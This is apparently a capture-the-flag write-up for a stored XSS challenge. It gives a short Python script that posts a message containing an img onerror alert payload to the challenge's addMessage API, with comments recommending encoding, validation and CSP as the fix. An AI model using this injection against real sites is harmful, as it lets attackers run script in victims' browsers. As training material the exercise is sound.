Wizer - Challenge 10 - XSS

Exploit

import requests

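# Proof of concept for the challenge's XSS: the addMessage API is sent a
# "message" field that contains HTML markup instead of plain text.
url = "https://chal10.vercel.app/api/addMessage"

# The body is a JSON array of {"name", "value"} form fields. The payload is a
# harmless alert() marker; it only demonstrates that markup is accepted.
# NOTE(review): the rendering side is not shown on this page - presumably the
# stored message is later inserted into the page as raw HTML, which is what
# lets the onerror handler run. The fix belongs in the application: validate
# the field on input, HTML-encode it on output, and back that up with a
# Content-Security-Policy that disallows inline event handlers.
r = requests.post(
    url,
    json=[
        {"name": "firstName", "value": "pelele"},
        {"name": "lastName", "value": "pelele"},
        {"name": "message", "value": "<img src=x onerror=alert('Wizer')>"},
    ],
    # Without a timeout, requests waits indefinitely on an unresponsive host.
    timeout=10,
)

# Print the raw response body returned by the API.
print(r.text)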